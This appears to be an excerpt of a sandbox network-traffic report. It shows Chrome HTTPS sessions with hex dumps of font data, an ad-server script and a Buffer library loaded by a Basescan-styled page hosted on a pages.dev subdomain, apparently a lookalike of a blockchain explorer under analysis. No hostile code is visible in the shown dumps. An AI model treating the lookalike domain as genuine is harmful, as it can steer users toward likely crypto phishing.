                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: e0 07 e0 13 e0 1a e0 1e e0 49 e0 52 e0 55 e0 77 e0 87 e1 fe e2 d0 e3 40 e3 60 e3 d9 e4 0f e4 3a e4 4a e4 99 e4 9b e4 a0 e5 30 e5 70 e5 ac e5 c6 e6 0b e6 18 e6 2b e6 2d e6 3b e6 40 e6 5c e6 63 f0 67 f0 69 f0 81 f0 8c f0 92 f0 99 f0 d2 f0 e1 f1 13 f1 28 f1 2a f1 36 f1 3b f1 55 f1 5a f1 66 f1 67 f1 6a f1 6b f1 70 f1 72 f1 73 f1 79 f1 80 f1 84 f1 89 f1 94 f1 98 f1 9a f1 9e f1 a0 f1 b4 f1 bc f1 ca f1 d0 f1 e7 f1 ed f1 f0 f1 fa f2 02 f2 08 f2 0d f2 10 f2 30 f2 31 f2 37 f2 3a f2 4b f2 5e f2 60 f2 63 f2 6d f2 70 f2 7c f2 80 f2 84 f2 92 f2 93 f2 95 f2 96 f2 9b f2 a5 f2 a9 f2 ac f2 ad f2 b0 f2 b8 f2 c4 f2 d5 f2 dd f2 e0 f3 5c f3 68 f3 78 f3 7f f3 83 f3 88 f3 8b f3 91 f3 99 f3 9d f3 a1 f3 a6 f3 b4 f3 c0 f3 c3 f3 c6 f3 c7 f3 c8 f3 ca f3 d0 f3 d2 f3 df f3 e1 f3 e6 f3
                                                                                                                                                                                                                                              Data Ascii: IRUw@`:J0p+-;@\cgi(*6;UZfgjkprsy017:K^`cmp|\hx
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 2c 00 2d 00 2e 00 2f 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3a 00 81 00 8d 00 95 00 a7 00 e3 01 10 01 17 01 1b 01 26 01 ba 00 0c 00 00 00 00 0a f0 00 00 00 00 00 00 00 e8 00 00 00 21 00 00 00 5d 00 00 00 01 00 00 00 60 00 00 00 60 00 00 00 3e 00 00 00 61 00 00 00 61 00 00 00 21 00 00 00 62 00 00 00 62 00 00 00 22 00 00 00 63 00 00 00 63 00 00 00 23 00 00 00 64 00 00 00 64 00 00 00 24 00 00 00 65 00 00 00 65 00 00 00 25 00 00 00 66 00 00 00 66 00 00 00 26 00 00 00 67 00 00 00 67 00 00 00 27 00 00 00 68 00 00 00 68 00 00 00 28 00 00 00 69 00 00 00 69 00 00 00 29 00 00 00 6a 00 00 00 6a 00 00 00 2a 00 00 00 6b 00 00 00 6b 00 00 00 2b 00 00 00 6c 00 00 00 6c 00 00 00 2c 00 00 00 6d 00 00 00 6d 00 00 00 2d 00 00 00 6e 00 00 00 6e 00 00
                                                                                                                                                                                                                                              Data Ascii: ,-./0123456789:&!]``>aa!bb"cc#dd$ee%ff&gg'hh(ii)jj*kk+ll,mm-nn
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 00 00 00 d9 00 00 f2 30 00 00 f2 30 00 00 00 81 00 00 f2 31 00 00 f2 32 00 00 00 e0 00 00 f2 37 00 00 f2 37 00 00 00 e2 00 00 f2 3a 00 00 f2 3e 00 00 00 e3 00 00 f2 4b 00 00 f2 4c 00 00 00 e8 00 00 f2 5e 00 00 f2 5e 00 00 00 ea 00 00 f2 60 00 00 f2 61 00 00 00 eb 00 00 f2 63 00 00 f2 6b 00 00 00 ed 00 00 f2 6d 00 00 f2 6e 00 00 00 f6 00 00 f2 70 00 00 f2 70 00 00 00 f8 00 00 f2 7c 00 00 f2 7e 00 00 00 f9 00 00 f2 80 00 00 f2 82 00 00 00 fc 00 00 f2 84 00 00 f2 8a 00 00 00 ff 00 00 f2 92 00 00 f2 92 00 00 00 03 00 00 f2 93 00 00 f2 94 00 00 01 06 00 00 f2 95 00 00 f2 95 00 00 00 05 00 00 f2 96 00 00 f2 99 00 00 01 08 00 00 f2 9b 00 00 f2 9b 00 00 01 26 00 00 f2 a5 00 00 f2 a6 00 00 01 0c 00 00 f2 a9 00 00 f2 ab 00 00 01 0e 00 00 f2 ac 00 00 f2 ac 00 00 01
                                                                                                                                                                                                                                              Data Ascii: 001277:>KL^^`ackmnpp|~&
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 00 02 0f 00 00 f8 34 00 00 f8 3d 00 00 02 10 00 00 f8 3f 00 00 f8 42 00 00 02 1a 00 00 f8 9e 00 00 f8 9e 00 00 02 1e 00 00 f8 a6 00 00 f8 a6 00 00 02 1f 00 00 f8 ca 00 00 f8 ca 00 00 02 20 00 00 f8 d2 00 00 f8 d2 00 00 02 21 00 00 f8 e1 00 00 f8 e1 00 00 02 22 00 00 f8 e8 00 00 f8 e8 00 00 02 23 00 01 f4 b2 00 01 f4 b2 00 00 00 04 00 00 00 00 00 00 00 00 00 a4 00 00 01 14 00 00 01 bc 00 00 02 e0 00 00 04 2c 00 00 04 c8 00 00 05 d4 00 00 06 54 00 00 06 d4 00 00 07 54 00 00 08 1c 00 00 08 98 00 00 08 ec 00 00 09 30 00 00 09 68 00 00 09 bc 00 00 0a 44 00 00 0a bc 00 00 0b 48 00 00 0c 04 00 00 0c 98 00 00 0d 4c 00 00 0d fc 00 00 0e 5c 00 00 0f 5c 00 00 10 04 00 00 10 64 00 00 10 dc 00 00 11 44 00 00 11 bc 00 00 12 20 00 00 12 ec 00 00 14 00 00 00 14 80 00 00
                                                                                                                                                                                                                                              Data Ascii: 4=?B !"#,TT0hDHL\\dD
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 00 01 67 60 00 01 68 b4 00 01 69 78 00 01 6a 98 00 01 6b 14 00 01 6d 08 00 01 6f 10 00 01 6f 98 00 01 70 20 00 01 75 ec 00 01 77 64 00 01 78 94 00 01 79 48 00 01 7a 80 00 01 7b 20 00 01 7b 7c 00 01 7c a0 00 01 7d e4 00 01 7f 88 00 01 7f e8 00 01 83 18 00 01 83 a8 00 01 84 00 00 01 84 d8 00 01 85 74 00 01 86 84 00 01 8b cc 00 01 8c ac 00 01 8e 70 00 01 8f 18 00 01 90 58 00 01 91 54 00 01 91 b4 00 01 92 38 00 01 93 70 00 01 9a a4 00 01 9e 34 00 01 9e e0 00 01 a1 04 00 01 a1 ac 00 01 a2 c4 00 01 a4 48 00 01 a5 54 00 01 ac ac 00 01 ae 30 00 01 af 08 00 01 b0 14 00 01 b2 00 00 01 b2 d0 00 01 b3 58 00 01 b5 34 00 01 b6 e4 00 01 b7 f4 00 01 b8 68 00 01 ba 20 00 01 bb 70 00 01 bb c8 00 01 bc 50 00 01 bd 24 00 01 bd b0 00 01 bf 28 00 01 c0 9c 00 01 c1 40 00 01 c3
                                                                                                                                                                                                                                              Data Ascii: g`hixjkmoop uwdxyHz{ {||}tpXT8p4HT0X4h pP$(@
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 09 09 0d 93 06 06 02 1b 12 12 01 01 12 12 1b 00 02 00 00 ff de 01 c0 01 a1 00 6a 00 73 00 00 13 16 17 31 31 16 07 07 31 33 31 37 31 36 37 36 17 16 17 16 07 07 31 33 31 32 17 16 15 14 07 06 23 23 31 07 31 33 31 32 17 16 15 14 07 06 23 23 31 07 31 06 07 06 27 26 27 26 37 37 31 23 31 07 31 06 07 06 27 26 27 26 37 37 31 23 31 22 27 26 35 34 37 36 33 33 31 37 31 23 31 22 27 26 35 34 37 36 33 33 31 37 31 36 37 36 17 17 07 37 07 33 31 37 31 23 b5 0e 07 07 01 0a 5f 0b 03 0a 0b 0d 0e 07 07 02 09 3a 0e 09 09 09 09 0e 45 15 3a 0e 09 09 09 09 0e 45 0b 03 0a 0b 0d 0e 07 07 02 09 5f 0b 03 0a 0b 0d 0e 07 07 02 09 3a 0e 09 09 09 09 0e 45 15 3a 0e 09 09 09 09 0e 45 0b 03 0a 0b 0d 06 15 15 15 5f 15 5f 01 a0 03 0a 0b 0d 3b 45 0e 07 07 01 03 0a 0b 0d 3b 09 09 0e 0e 09 09 80
                                                                                                                                                                                                                                              Data Ascii: js11131716761312##11312##11'&'&771#11'&'&771#1"'&547633171#1"'&54763317167673171#_:E:E_:E:E__;E;
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 07 06 07 25 07 03 02 0b 16 1d 1c 03 03 1c 1d 16 0b 02 03 07 08 0d 0c 0c 14 19 1a 13 13 01 01 13 13 1a 19 14 0c 0c 0d 08 01 92 0c 0c 0d 08 0d 2a 2b 43 43 2b 2a 0d 08 0d 0c 0c 0b 02 03 07 0d 1e 1d 2d 2c 3a 3a 2c 2d 1d 1e 0d 07 03 02 0b 00 01 ff fe ff e0 01 82 01 a0 00 4a 00 00 13 32 17 31 31 16 15 15 31 37 31 36 17 16 17 16 07 06 07 07 31 17 31 16 17 16 07 06 07 06 27 27 31 15 31 14 07 06 23 22 27 26 35 35 31 07 31 06 27 26 27 26 37 36 37 37 31 27 31 26 27 26 37 36 37 36 17 17 31 35 31 34 37 36 33 c0 0e 09 09 70 0b 0d 0c 07 07 03 03 0c 72 73 0b 03 03 06 08 0c 0d 0b 70 09 09 0e 0e 09 09 6f 0c 0d 0c 07 07 03 03 0c 72 72 0c 03 03 07 07 0c 0d 0b 70 09 09 0e 01 a0 09 09 0e 88 43 07 03 03 0c 0b 0d 0c 08 44 45 07 0c 0d 0c 0b 03 03 06 43 87 0e 09 09 09 09 0e 87 42
                                                                                                                                                                                                                                              Data Ascii: %*+CC+*-,::,-J211171611''11#"'&5511'&'&76771'1&'&76761514763prsporrpCDECB


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              133192.168.2.549882104.26.8.1884435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC528OUTGET /d3d3/ZGVsaXZlcnk/YXN5bmNqcw==.php HTTP/1.1
                                                                                                                                                                                                                                              Host: eas.etherscan.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Cookie: OAGEO=2%7CUS%7CNA%7C%7CNew%20York%7C10118%7C40.7123%7C-74.0068%7C20%7CAmerica%2FNew_York%7C501%7CNY%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC699INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                              Content-Length: 4330
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              ETag: 033e0828aecd8a15c31181716c4b1552
                                                                                                                                                                                                                                              Expire: Sat, 28 Sep 2024 02:16:08 GMT
                                                                                                                                                                                                                                              Cache-Control: private, max-age=3600
                                                                                                                                                                                                                                              P3P: CP="CUR ADM OUR NOR STA NID"
                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BuHdqhVuHsdkyg84f6amAyzi9VIUNtI9fhQlAXMbTs%2FwcIpU7Tl6%2FPzyBND5fiZ9%2BX98paauPr6K0V3CCUdVWcxzUyx%2FEEm5b0pnRSVvZH%2Bbfmcsvq7ITpv5Dxykk4TziAzF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2eb3c9d7c8e-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC670INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 64 2c 63 29 7b 76 61 72 20 61 3d 22 30 33 33 65 30 38 32 38 61 65 63 64 38 61 31 35 63 33 31 31 38 31 37 31 36 63 34 62 31 35 35 32 22 3b 63 2e 72 65 76 69 76 65 41 73 79 6e 63 3d 63 2e 72 65 76 69 76 65 41 73 79 6e 63 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 79 70 65 6f 66 20 65 2e 43 75 73 74 6f 6d 45 76 65 6e 74 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 66 75 6e 63 74 69 6f 6e 20 67 28 69 2c 6a 29 7b 6a 3d 6a 7c 7c 7b 62 75 62 62 6c 65 73 3a 66 61 6c 73 65 2c 63 61 6e 63 65 6c 61 62 6c 65 3a 66 61 6c 73 65 2c 64 65 74 61 69 6c 3a 75 6e 64 65 66 69 6e 65 64 7d 3b 76 61 72 20 68 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74
                                                                                                                                                                                                                                              Data Ascii: (function(d,c){var a="033e0828aecd8a15c31181716c4b1552";c.reviveAsync=c.reviveAsync||{};(function(e){if(typeof e.CustomEvent==="function"){return false}function g(i,j){j=j||{bubbles:false,cancelable:false,detail:undefined};var h=document.createEvent("Cust
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 65 6e 65 72 28 22 73 74 61 72 74 22 2c 66 2e 73 74 61 72 74 29 3b 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 66 72 65 73 68 22 2c 66 2e 72 65 66 72 65 73 68 29 3b 66 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 22 73 74 61 72 74 22 2c 7b 73 74 61 72 74 3a 74 72 75 65 7d 29 7d 7d 63 61 74 63 68 28 68 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 68 29 7d 7d 3b 66 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 22 69 6e 69 74 22 29 3b 69 66 28 64 2e 72 65 61 64 79 53 74 61 74 65 3d 3d 3d 22 63 6f 6d 70 6c 65 74 65 22 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 65 29 7d 65 6c 73 65 7b 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 66 61 6c 73 65 29 3b 63 2e 61 64 64 45 76 65
                                                                                                                                                                                                                                              Data Ascii: ener("start",f.start);f.addEventListener("refresh",f.refresh);f.dispatchEvent("start",{start:true})}}catch(h){console.log(h)}};f.dispatchEvent("init");if(d.readyState==="complete"){setTimeout(e)}else{d.addEventListener("DOMContentLoaded",e,false);c.addEve
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 22 69 6e 73 5b 22 2b 66 2e 67 65 74 44 61 74 61 41 74 74 72 28 22 69 64 22 29 2b 22 3d 27 22 2b 61 2b 22 27 5d 22 29 3b 76 61 72 20 6c 3d 7b 65 6d 39 75 5a 57 6c 6b 3a 5b 5d 2c 70 72 65 66 69 78 3a 66 2e 6e 61 6d 65 2b 22 2d 22 2b 66 2e 77 78 35 76 62 2b 22 2d 22 7d 3b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 65 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 70 3d 66 2e 67 65 74 44 61 74 61 41 74 74 72 28 22 65 6d 39 75 7a 77 6c 6b 22 29 2c 6b 3d 66 2e 67 65 74 44 61 74 61 41 74 74 72 28 22 79 77 70 7a 22 29 2c 6e 3d 65 5b 72 5d 2c 73 3b 69 66 28 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 6b 29 29 7b 73 3d 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 29 7d 65 6c 73 65 7b 73 3d 66 2e 79 77 70 7a 2b 2b 3b 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65
                                                                                                                                                                                                                                              Data Ascii: "ins["+f.getDataAttr("id")+"='"+a+"']");var l={em9uZWlk:[],prefix:f.name+"-"+f.wx5vb+"-"};for(var r=0;r<e.length;r++){var p=f.getDataAttr("em9uzwlk"),k=f.getDataAttr("ywpz"),n=e[r],s;if(n.hasAttribute(k)){s=n.getAttribute(k)}else{s=f.ywpz++;n.setAttribute
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC922INData Raw: 6c 6f 6e 65 4e 6f 64 65 28 66 61 6c 73 65 29 3b 69 66 28 70 2e 69 66 72 61 6d 65 46 72 69 65 6e 64 6c 79 29 7b 76 61 72 20 6b 3d 66 2e 63 72 65 61 74 65 46 72 61 6d 65 28 70 29 3b 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6b 29 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 6e 2c 6f 29 3b 66 2e 6c 6f 61 64 46 72 61 6d 65 28 6b 2c 70 2e 68 74 6d 6c 29 7d 65 6c 73 65 7b 6e 2e 73 74 79 6c 65 2e 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3d 22 6e 6f 6e 65 22 3b 6e 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 2e 68 74 6d 6c 3b 76 61 72 20 67 3d 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 53 43 52 49 50 54 22 29 3b 66 6f 72 28 76 61 72 20 6d 3d 30 3b 6d 3c 67 2e 6c 65 6e 67 74 68 3b 6d 2b 2b 29 7b 76 61 72 20
                                                                                                                                                                                                                                              Data Ascii: loneNode(false);if(p.iframeFriendly){var k=f.createFrame(p);n.appendChild(k);o.parentNode.replaceChild(n,o);f.loadFrame(k,p.html)}else{n.style.textDecoration="none";n.innerHTML=p.html;var g=n.getElementsByTagName("SCRIPT");for(var m=0;m<g.length;m++){var


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              134192.168.2.549885104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC608OUTGET /assets/js/custom/web3-utils.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC816INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 08 Feb 2023 11:53:54 GMT
                                                                                                                                                                                                                                              ETag: W/"035834b43bd91:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 28437
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ey0OXDLtSN%2F3fj%2F7%2FLNvILOEhywnTCaDhjqqIGvnJB83ZZ64FCVgjCAbblb2Z13IzXxv4iKBKujb2kXLY3NMMUMb75vpLQB1zVKkS6Wcy347F5fFzlZjUNbljElM%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2eda98b72a1-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC553INData Raw: 37 63 37 30 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 29 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3b 65 6c 73 65 7b 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c
                                                                                                                                                                                                                                              Data Ascii: 7c70!function(t){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?sel
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 28 6e 2e 65 78 70 6f 72 74 73 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 28 75 5b 72 5d 5b 31 5d 5b 74 5d 7c 7c 74 29 7d 2c 6e 2c 6e 2e 65 78 70 6f 72 74 73 2c 6f 2c 75 2c 73 2c 68 29 7d 72 65 74 75 72 6e 20 73 5b 72 5d 2e 65 78 70 6f 72 74 73 7d 66 6f 72 28 76 61 72 20 66 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 2c 74 3d 30 3b 74 3c 68 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 61 28 68 5b 74 5d 29 3b 72 65 74 75 72 6e 20 61 7d 28 7b 31 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 62 79 74 65 4c 65 6e 67 74 68 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3d 70 28 74 29 2c 69 3d 72 5b 30 5d 2c 65 3d 72 5b 31 5d 3b
                                                                                                                                                                                                                                              Data Ascii: (n.exports,function(t){return a(u[r][1][t]||t)},n,n.exports,o,u,s,h)}return s[r].exports}for(var f="function"==typeof require&&require,t=0;t<h.length;t++)a(h[t]);return a}({1:[function(t,r,i){"use strict";i.byteLength=function(t){var r=p(t),i=r[0],e=r[1];
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 72 20 65 2c 6e 2c 6f 3d 5b 5d 2c 75 3d 72 3b 75 3c 69 3b 75 2b 3d 33 29 65 3d 28 74 5b 75 5d 3c 3c 31 36 26 31 36 37 31 31 36 38 30 29 2b 28 74 5b 75 2b 31 5d 3c 3c 38 26 36 35 32 38 30 29 2b 28 32 35 35 26 74 5b 75 2b 32 5d 29 2c 6f 2e 70 75 73 68 28 73 5b 28 6e 3d 65 29 3e 3e 31 38 26 36 33 5d 2b 73 5b 6e 3e 3e 31 32 26 36 33 5d 2b 73 5b 6e 3e 3e 36 26 36 33 5d 2b 73 5b 36 33 26 6e 5d 29 3b 72 65 74 75 72 6e 20 6f 2e 6a 6f 69 6e 28 22 22 29 7d 6c 5b 22 2d 22 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 5d 3d 36 32 2c 6c 5b 22 5f 22 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 5d 3d 36 33 7d 2c 7b 7d 5d 2c 32 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 69 29 7b 7d 2c 7b 7d 5d 2c 33 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 55 29 7b 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                              Data Ascii: r e,n,o=[],u=r;u<i;u+=3)e=(t[u]<<16&16711680)+(t[u+1]<<8&65280)+(255&t[u+2]),o.push(s[(n=e)>>18&63]+s[n>>12&63]+s[n>>6&63]+s[63&n]);return o.join("")}l["-".charCodeAt(0)]=62,l["_".charCodeAt(0)]=63},{}],2:[function(t,r,i){},{}],3:[function(t,r,U){(functio
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 20 4f 62 6a 65 63 74 2e 20 52 65 63 65 69 76 65 64 20 74 79 70 65 20 22 2b 63 28 74 29 29 3b 69 66 28 52 28 74 2c 41 72 72 61 79 42 75 66 66 65 72 29 7c 7c 74 26 26 52 28 74 2e 62 75 66 66 65 72 2c 41 72 72 61 79 42 75 66 66 65 72 29 29 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 69 29 7b 69 66 28 72 3c 30 7c 7c 74 2e 62 79 74 65 4c 65 6e 67 74 68 3c 72 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 27 22 6f 66 66 73 65 74 22 20 69 73 20 6f 75 74 73 69 64 65 20 6f 66 20 62 75 66 66 65 72 20 62 6f 75 6e 64 73 27 29 3b 69 66 28 74 2e 62 79 74 65 4c 65 6e 67 74 68 3c 72 2b 28 69 7c 7c 30 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 27 22 6c 65 6e 67 74 68 22 20 69 73 20 6f 75 74 73 69 64 65 20 6f 66
                                                                                                                                                                                                                                              Data Ascii: Object. Received type "+c(t));if(R(t,ArrayBuffer)||t&&R(t.buffer,ArrayBuffer))return function(t,r,i){if(r<0||t.byteLength<r)throw new RangeError('"offset" is outside of buffer bounds');if(t.byteLength<r+(i||0))throw new RangeError('"length" is outside of
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 6e 20 61 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 6c 65 6e 67 74 68 3c 30 3f 30 3a 30 7c 66 28 74 2e 6c 65 6e 67 74 68 29 2c 69 3d 75 28 72 29 2c 65 3d 30 3b 65 3c 72 3b 65 2b 3d 31 29 69 5b 65 5d 3d 32 35 35 26 74 5b 65 5d 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 29 7b 69 66 28 69 3c 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 41 74 74 65 6d 70 74 20 74 6f 20 61 6c 6c 6f 63 61 74 65 20 42 75 66 66 65 72 20 6c 61 72 67 65 72 20 74 68 61 6e 20 6d 61 78 69 6d 75 6d 20 73 69 7a 65 3a 20 30 78 22 2b 69 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2b 22 20 62 79 74 65 73 22 29 3b 72 65 74 75 72 6e 20 30 7c 74 7d 66 75 6e 63 74 69 6f 6e 20 70 28 74 2c 72 29 7b 69 66 28 6c 2e 69 73 42 75 66 66 65 72 28 74
                                                                                                                                                                                                                                              Data Ascii: n a(t){for(var r=t.length<0?0:0|f(t.length),i=u(r),e=0;e<r;e+=1)i[e]=255&t[e];return i}function f(t){if(i<=t)throw new RangeError("Attempt to allocate Buffer larger than maximum size: 0x"+i.toString(16)+" bytes");return 0|t}function p(t,r){if(l.isBuffer(t
